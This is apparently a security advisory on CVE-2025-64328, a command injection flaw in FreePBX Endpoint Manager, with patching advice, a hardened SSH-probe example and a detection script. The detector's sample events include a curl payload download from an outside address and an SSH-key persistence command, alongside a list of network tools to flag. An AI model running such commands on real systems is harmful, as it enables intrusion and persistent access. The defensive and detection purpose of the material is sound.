Key Takeaway
CVE-2025-64328 is a post-authentication OS command injection vulnerability in Sangoma FreePBX Endpoint Manager, specifically within the testconnection check_ssh_connect() function. Authenticated attackers can execute arbitrary system commands as the asterisk user, gaining remote code execution on the PBX host. CISA has added this flaw to the KEV catalog with a federal patch deadline of February 24, 2026.
CVE-2025-64328: Sangoma FreePBX Endpoint Manager OS Command Injection Enables Remote Code Execution
- Affected Product: Sangoma FreePBX Endpoint Manager
- CVE ID: CVE-2025-64328
- Vulnerability Type: OS Command Injection (CWE-78)
- Attack Vector: Network, Post-Authentication
- CISA KEV Patch Deadline: 2026-02-24
Vulnerability Details
Sangoma FreePBX Endpoint Manager contains an OS command injection vulnerability in the testconnection → check_ssh_connect() function. An authenticated user with valid FreePBX credentials can inject arbitrary operating system commands through this function, which fails to properly sanitize user-supplied input before passing it to the underlying system shell.
The flaw is post-authentication, meaning an attacker must first possess valid credentials to exploit it. However, this does not substantially limit the attack surface in environments where FreePBX administrative accounts are shared, weakly protected, or exposed to insider threats. FreePBX deployments frequently run in SMB and enterprise telephony environments where administrative credential hygiene is inconsistent.
Successful exploitation allows command execution under the asterisk user context — the service account that runs Asterisk, the open-source PBX engine underpinning FreePBX. While this is not root-level access by default, the asterisk user typically has read access to call detail records, SIP credentials, voicemail data, and dial plan configurations. Depending on system configuration, privilege escalation from asterisk to root may be achievable through secondary misconfigurations.
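The defect class described above is a connectivity check that splices user-controlled host, user and port values into a shell command line. The following is an added illustration (not Sangoma's code, and not the actual check_ssh_connect() implementation) of how such a probe is written so that no shell ever sees the input: each field is validated against a strict grammar and the command is passed to the kernel as an argv list. The function names and the hostname/username patterns are assumptions for this example.

```python
import ipaddress
import re
import subprocess

# Unsafe pattern this replaces (illustrative, not the vendor's code):
#   os.system(f"ssh -p {port} {user}@{host} true")
# A shell parses that string, so metacharacters in any field become commands.

# Strict grammars for the three fields. Both start with an alphanumeric or
# underscore, so a value beginning with "-" can never be read by ssh as an option.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
USERNAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def validate_host(host: str) -> str:
    """Accept an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME.match(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")


def validate_user(user: str) -> str:
    if USERNAME.match(user):
        return user
    raise ValueError(f"rejected user value: {user!r}")


def validate_port(port) -> int:
    p = int(str(port), 10)  # raises ValueError on anything that is not an integer
    if not 1 <= p <= 65535:
        raise ValueError(f"port out of range: {p}")
    return p


def build_ssh_probe(host: str, user: str, port) -> list:
    """Return the argv for a non-interactive reachability probe. No shell is involved,
    so the fields are delivered to ssh as single, literal arguments."""
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            "-p", str(validate_port(port)),
            f"{validate_user(user)}@{validate_host(host)}", "true"]


def run_ssh_probe(host: str, user: str, port, timeout: int = 10) -> bool:
    """Execute the probe with shell=False (the default) and report reachability."""
    res = subprocess.run(build_ssh_probe(host, user, port),
                         capture_output=True, text=True, timeout=timeout)
    return res.returncode == 0
```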
Real-World Impact
FreePBX powers a significant portion of self-hosted VoIP infrastructure globally, and Sangoma's Endpoint Manager is a widely deployed add-on module used to manage IP phone provisioning and connectivity. Organizations running FreePBX on-premises — including healthcare providers, legal firms, financial services companies, and managed service providers — are directly exposed.
An attacker exploiting CVE-2025-64328 can:
- Execute arbitrary commands on the host system as the asterisk user
- Access SIP trunk credentials and internal extension configurations
- Exfiltrate call detail records and voicemail audio files
- Pivot laterally within the network from a compromised PBX host
- Establish persistent remote access via reverse shells or dropped SSH keys
FreePBX systems are frequently internet-facing, either directly or through exposed administrative portals, which increases the likelihood that compromised credentials could be obtained through phishing, credential stuffing, or prior data breaches before this vulnerability is weaponized.
CISA has added CVE-2025-64328 to the Known Exploited Vulnerabilities (KEV) catalog and mandates that federal civilian executive branch (FCEB) agencies apply mitigations by February 24, 2026. Non-federal organizations should treat this deadline as a reference benchmark rather than a ceiling.
Patching and Mitigation Guidance
1. Apply the Sangoma Security Patch
Inventory all FreePBX Endpoint Manager deployments immediately. Apply the latest Sangoma-issued security update as soon as it is available through the FreePBX Module Admin interface or Sangoma's official update channels. Verify patch application by checking the installed module version against Sangoma's published advisory.
2. Restrict Administrative Access
Lock down FreePBX administrative interfaces. Remove public internet exposure of the FreePBX web GUI where not operationally required. Place administrative access behind a VPN or restrict it to known management IP ranges using firewall ACLs or iptables rules.
3. Enforce Strong Authentication
Audit all FreePBX user accounts. Remove stale or shared accounts. Enforce strong, unique passwords for all administrative users. Enable multi-factor authentication on the FreePBX administrative portal if your deployment supports it or if a supporting module is available.
4. Monitor for Exploitation Indicators
Configure your SIEM to alert on anomalous process execution originating from the asterisk user, particularly shell spawning, outbound network connections from PBX processes, and access to sensitive configuration files outside normal operational patterns. Review /var/log/asterisk/ and system auth logs for unusual activity.
5. Audit Endpoint Manager Usage
If Endpoint Manager is not actively in use, disable or uninstall the module through FreePBX Module Admin to eliminate the attack surface entirely until a patch is confirmed applied and validated.
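The monitoring guidance in step 4 can be turned into concrete rules. The following added example (not from the page's source or from Sangoma) scans process-execution events for the three behaviours called out above: a shell spawned under the asterisk account by the web stack that serves the FreePBX GUI, a network tool run as asterisk reaching outside the internal address ranges, and a write to an authorized_keys file. The JSON Lines event format, the field names and the sample events are constructed for this example; the internal network list is an assumption to adapt per site.

```python
import ipaddress
import json
import os
import re

# Constructed sample telemetry (JSON Lines), not real logs. Event 2 is the legitimate
# Endpoint Manager connectivity test; events 3 to 5 model post-exploitation behaviour.
SAMPLE_EVENTS = """\
{"ts":"2026-02-10T09:12:01Z","user":"asterisk","parent":"asterisk","exe":"/usr/sbin/asterisk","cmd":"asterisk -rx 'core show channels'"}
{"ts":"2026-02-10T09:12:07Z","user":"asterisk","parent":"php-fpm","exe":"/usr/bin/ssh","cmd":"ssh -o BatchMode=yes admin@10.0.0.15 true"}
{"ts":"2026-02-10T09:12:09Z","user":"asterisk","parent":"php-fpm","exe":"/bin/sh","cmd":"sh -c curl http://203.0.113.9/x -o /tmp/x"}
{"ts":"2026-02-10T09:12:11Z","user":"asterisk","parent":"sh","exe":"/usr/bin/curl","cmd":"curl http://203.0.113.9/x -o /tmp/x"}
{"ts":"2026-02-10T09:12:15Z","user":"asterisk","parent":"sh","exe":"/bin/bash","cmd":"bash -c 'cat >> /home/asterisk/.ssh/authorized_keys'"}
{"ts":"2026-02-10T09:13:02Z","user":"root","parent":"sshd","exe":"/bin/bash","cmd":"bash"}
"""

# Assumed internal ranges; anything else counts as external for the purposes of rule 2.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
WEB_PARENTS = {"php-fpm", "httpd", "apache2", "nginx"}   # processes serving the FreePBX GUI
SHELLS = {"sh", "bash", "dash"}
NET_TOOLS = {"curl", "wget", "nc", "ncat", "socat"}
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify(ev: dict) -> list:
    """Return the names of the rules an event triggers (empty when benign)."""
    if ev.get("user") != "asterisk":
        return []
    hits, exe, cmd = [], os.path.basename(ev.get("exe", "")), ev.get("cmd", "")
    if ev.get("parent") in WEB_PARENTS and exe in SHELLS:
        hits.append("shell_from_web_process")          # rule 1: GUI stack spawning a shell
    if exe in NET_TOOLS:
        for ip in IPV4.findall(cmd):
            try:
                if not is_internal(ip):
                    hits.append("external_connection_by_net_tool")  # rule 2
                    break
            except ValueError:           # digits that are not a valid address
                continue
    if "authorized_keys" in cmd:
        hits.append("ssh_key_persistence_attempt")     # rule 3: dropped SSH key
    return hits


def scan(lines: str) -> list:
    """Yield (timestamp, rule, command) for every event that triggers a rule."""
    findings = []
    for line in filter(str.strip, lines.splitlines()):
        ev = json.loads(line)
        findings.extend((ev["ts"], rule, ev["cmd"]) for rule in classify(ev))
    return findings
```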
Summary Table
| Field | Detail |
|---|---|
| CVE ID | CVE-2025-64328 |
| Vendor | Sangoma |
| Product | FreePBX Endpoint Manager |
| Flaw Type | OS Command Injection |
| Attack Vector | Network, Authenticated |
| Impact | Remote Code Execution as asterisk user |
| CISA KEV Deadline | February 24, 2026 |
Organizations running Sangoma FreePBX should treat this vulnerability as high priority given the sensitive data processed by PBX systems and the availability of the CISA KEV designation as a signal of active or expected exploitation.
Original Source
CISA KEV